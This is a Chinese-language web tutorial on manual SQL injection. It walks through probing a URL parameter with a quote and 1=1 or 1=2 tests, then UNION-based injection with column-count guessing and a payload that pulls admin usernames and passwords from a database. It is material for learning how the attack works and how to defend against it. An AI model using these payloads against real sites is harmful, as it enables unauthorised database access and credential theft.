假設的目標網站 http://www.2cto.com /info.php?articleid=123(實際不可注入)
當articleid 變量取值為123 時,我們假設一下在服務器中會有怎樣的代碼運行?
1. SELECT * /* Select 函數讀取信息*/
2. FROM infotable /* 從products 數據表中*/
3. WHERE id='123';/* false condition 滿足條件時*/
/*XXXX*/是注釋符號,當程序運行時,/**/和中間的部分計算機會自動忽略。
實際系統執行的代碼是這樣的:
1. select * from infotable where id = '123';
在這里,id 的取值是通過url 取值得來的“123”,那么如果我這樣呢:
info.php?articleid=123'
后面多了一個單引號,那么比較一下系統原本執行的語句有什么變化:
1. select * from infotable where id = 123;
2. select * from infotable where id = 123';
最后多了一個引號,語法錯誤。
注:計算機編程得不到想要的結果,錯誤分兩種,一種是語法錯誤,一種是邏輯錯誤。后面認真閱讀你會慢慢明白區別開的,這也就是為什么判斷是否為注入點的第一步要在網址后面加單引號的原因了(加單引號出錯不能確定網址為注入點,只是判斷的一個步驟而已),于是后面的1=1 和1=2 的目的也就清楚了。
1. select * from infotable where id = 123;
2. select * from infotable where id = 123 and 1 = 1;//事實上1 就是1,所以應該
返回正常頁面
3. select * from infotable where id = 123 and 1 = 2;//事實上,計算機中1 永遠也不等于2,發生邏輯錯誤,所以返回錯誤頁面。手工注入通常會使用聯合查詢函數union 下面講一下union 的用法。
union 注入的第一步通常是猜字段數。假設注入點是新聞頁面,那么頁面中執行的SQL 語句就是:
1. select title,date,author,news,comm from news where id = 12;
當你進行union 注入的時候,union 前面的語句和union 后面的語句,都是一個完整的SQL
語句,是可以單獨執行的語句
但是,必須保證前后的字段數相同,例如上面這個語句
1. select title,date,author,news,comm from news where id = 12;
2. select title,date,author,news,comm from news where id = 12 union select
name,password,3,4,5 from admin;
3. //news 是新聞表段,admin 是管理員信息表段
4. //管理員信息表段明顯沒有union 前面news 表段里面包含的字段數多所以使用數字3 到5 替代,數字無固定格式,可以使1 2 和3,也可以是111111 和4435435或者干脆用null 空來代替。
所以,上面的注入語句在實際中就是這么構造:
1. info.php?id=12+union+select+name,password,3,4,5+from+admin
2. //SQL 注入中,加號用來代表空格的意思,因為有些瀏覽器會自動將空格轉換成%20,
如果union 前面是5 個,而union 后面不是5 個,則會發生邏輯錯誤,顯示錯誤頁面。
由于程序員編寫的程序我們并不知道他在數據庫中設置了幾個字段,所以通常我們都是先進行字段數的猜測,也就是:
1. info.php?id=12+union+select+1
2. info.php?id=12+union+select+1,2
3. info.php?id=12+union+select+1,2,3
4. info.php?id=12+union+select+1,2,3,4
5. info.php?id=12+union+select+1,2,3,4,5
6. //你也可以用order by 來猜,用法可以自己搜一下
一直這樣猜到正確頁面出來,沒有了邏輯錯誤,也就表示字段數一致了,然后……后面……
這里僅僅提供思路。
更多信息請查看IT技術專欄
公眾號
事業單位
當前位置:
公考類
招聘類
各類考試
